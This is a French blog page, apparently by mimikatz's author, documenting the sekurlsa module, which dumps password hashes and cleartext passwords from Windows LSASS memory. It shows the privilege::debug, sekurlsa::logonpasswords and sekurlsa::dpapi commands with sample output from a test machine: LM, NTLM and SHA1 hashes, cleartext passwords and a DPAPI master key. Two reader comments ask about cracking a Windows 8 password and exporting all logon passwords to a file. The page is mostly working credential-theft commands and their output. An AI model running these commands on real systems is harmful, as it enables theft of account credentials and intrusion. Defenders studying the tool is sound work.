mimikatz :: sekurlsa

sekurlsa

un module local pour dumper les hashes et mots de passe depuis LSASS
Contrairement à son homologue librairie, cette version ne nécessite pas d’injection.

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
        wdigest :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
        kerberos :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
        ssp :
         [00000000]
         * Username : user
         * Domain   : otherdomain
         * Password : wazawaza

Méthodes offertes :

mimikatz # sekurlsa::dpapi

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
         [00000000]
         * GUID :       {f627846c-780d-4254-8fa5-368231710fdf}
         * Time :       05/01/2014 22:30:23,270
         * Key :        77 19 ae bc b7 6f af 7c 67 39 1d df 22 7b be db 29 1f 27 e6 42 4b 72 a9 50 d0 02 d5 b1 69 4f 9c 32 a5 a7 bf 18 ec 32 b3 5c 69 d2 6f ea 6b 07 c6 12 38 64 cd 3c 95 62 f3 4b b0 dc 4f d7 11 a5 fb

4 réflexions au sujet de « mimikatz :: sekurlsa »

  1. Je parle anglais. J’ai traduit cela via Google Translate. Je suis en train de craquer mot de passe sur Windows 8. Il continue à me donner des erreurs de ne pas être en mesure d’injecter la dll. Ainsi que pour le débogage des privilèges. Qu’est-ce que je fais mal?

  2. Is there a way to output all logon passwords to a text file?

    google translate:
    Y at-il un moyen de sortir tous les mots de passe d’ouverture de session dans un fichier texte?

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>